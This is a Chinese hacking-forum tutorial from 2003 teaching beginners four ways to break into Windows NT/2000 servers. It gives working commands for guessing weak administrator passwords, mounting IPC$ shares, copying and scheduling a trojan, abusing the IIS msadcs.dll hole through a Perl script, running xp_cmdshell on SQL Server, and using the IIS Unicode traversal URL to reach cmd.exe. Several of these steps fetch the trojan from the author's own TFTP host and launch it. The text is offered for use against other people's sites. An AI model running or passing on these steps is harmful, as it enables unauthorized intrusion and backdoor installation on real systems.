| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 | 
服务导航 我要发布 主力频道 空间域名 精华收集 服务器出租 黑客培训 光盘刻录 特色服务 解决方案 我要投诉
您现在的位置: 华盟网 >> Hack >> 新手入门 >> 正文 用户登录 新用户注册
对NT的攻击手段         ★★★ 【字体:
对NT的攻击手段
作者:嘎嘎 文章来源:来自 Internet 点击数: 更新时间:2003-12-2
对NT的攻击手段
                                               作者:嘎嘎
对NT的攻击手段,这里要用几个软件
我的系统是WIN2000,还有PERL,头发TFTP TURB98,TWWWSCAN0.6,NEWLETMEIN,
NETBUS1。7(木马),MSSQL7 ,netsvc.exe
所有对NT的攻击都是因为管理员的懒惰,可能是懒的改密码,懒的升级,懒得打
补丁,,,,这里我就说说我曾用过的4个比较普遍的大漏洞
1,开了共享,而且ADMINISTRATORS组密码简单要不是空,要不是和用户名1样
对于这样的傻瓜管理员,,攻击变的简单,在WIN2000的命令提示符下
这样输入
c:\>newletmein xxx.xxx.xxx.xxx -all -g
xxx.xxx.xxx.xxx是你要攻击的网站的IP地址
然后等待程序执行完毕,如果发现可用的用户名和密码,程序会告诉你,记住这个
用户名和密码,再这样输入(这里假设用户名为ADMIN。密码也是ADMIN)
c:\>net use \\XXX.XXX.XXX.XXX\IPC$ "ADMIN" /USER:"ADMIN"
程序显示命令完成,接着来
c:\>copy c:\netsvc.exe \\xxx.xxx.xxx.xxx\admin$\system32
程序显示1个文件COPY成功
接着来
c:\>copy c:\ntsrv.exe \\xxx.xxx.xxx.xxx\admin$\system32
程序显示1个文件COPY成功
接着来
c:\>netsvc \\xxx.xxx.xxx.xxx schedule /start
等显示成功,接着来,这里假设对方时间为13:00(这里可以用NET TIME看时间)
c:\>at \\xxx.xxx.xxx.xxx 13:00 ntsrv.exe /port:65432 /nomsg
程序会告诉你这个命令的ID号,等时间一到,用木马连他的机器的65432端口
可以加上自己的密码,和更改端口,目标搞定
2,目标开了WEB服务,IIS有漏洞msadcs.dll漏洞,这个漏洞可以用TWWWSCAN扫描
到,为了确认这个漏洞,你可以在浏览器的网址栏里输入这个文件的具体路径来确认
IE将显示application/x_varg,说明这个漏洞存在,然后在PERL下,进行攻击
C:\Perl\BIN>perl -x msadcs.txt -h xxx.xxx.xxx.xxx
Please type the NT commandline you want to run (cmd /c assumed):\n
cmd /c 一般这里我用TFTP上传我的木马文件,但首先你得先设置好你的TFTP主机
tftp -i 61.137.157.156 get ntsrv.exe c:\winnt\system32\ntsrv.exe
这里61.137.157.156是我的TFTP主机,TFTP目录下有NTSRV。EXE木马
如果程序执行成功,TFTP会显示文件传输的进度,然后再执行PERL,将木马激活
,你再用木马连上对方的机器,搞定
3,目标开了WEB服务,而且有SQL服务,一般SQL服务器开1433端口
如果WEB服务器用ASP等等。。。你如果能看到ASP或者GLOBAL。ASA的原码,
而且把用户名或者密码写在这里,OK,你已经差不多搞定拉
打开SQL SERVER 7。0 在client network uitlity里输入对方IP,通讯选TCP/IP
端口选1433,然后应用确定,再打开query analyzer SERVER选你要攻击的
IP,用户名和密码输入,连接他,等会,连上拉
在上面这样输入
create proc #1 as exec master..xp_cmdshell'dir c:\'
go
exec #1
按F5执行,会显示对方机器的文件目录,然后用TFTP上传你的木马,并且执行,再用木马连接他
搞定(需要注意的是PROC的号要执行1次换1个,单引号间是命令行)
4,目标开了WEB服务,IIS有漏洞,这里要说现在比较普遍的双字节编码漏洞。理论
这里不说,也说不好,照着干就可以拉。发现目标XXX。XXX。XXX。XXX
在浏览器里输入
http://xxx.xxx.xxx.xxx/.idq
显示路径,WEB是在那里
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
这样我们将得到对方的文件目录
然后这样
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i 61.137.157.156 get ntsrv.exe c:\winnt\system32\ntsrv.exe
等文件传完,再这样
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\winnt\system32\ntsrv.exe
木马被启动,用木马连上,搞定,但是权限可能不是管理员,有办法成为管理员
等以后再说吧!可能有的细节和你实践不一样,具体问题具体对待,还有什么以后
再交流吧!
责任编辑:admin  联系方式  Email:admin
电话:51228163
  • 上一篇黑客:

  • 下一篇黑客:
    • (只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
    姓 名:
    		 * 游客填写  ·注册用户
    主 页:
    评 分:
    		 1分 2分 3分 4分 5分
    评论内容:
    验证码: *
  • 请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。
  • 严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论 。
  • 用户需对自己在使用本站服务过程中的行为承担法律责任(直接或间接导致的)。
  • 本站管理员有权保留或删除评论内容。
  • 评论内容只代表网友个人观点,与本网站立场无关。
    • 最新hack更新
    最新推荐资讯
    相关黑客
    菜鸟也批量拿N多SHELL
    菜鸟玩注入精品NBSI2
    加密最安全解密最潇洒
    菜鸟必懂木马连接原理
    Alt快捷键应用13招大放送
    入侵博客入侵太简单了
    加密最安全解密最潇洒
    菜鸟必懂木马连接原理
    菜鸟必备虚拟机安装详解
    十三步简单入侵个人pc
    最新会员软件
    最新推荐视频
    最新推荐动画

    Copyright @ 2005 77169.Net Inc. All rights reserved. 华夏黑客同盟 版权所有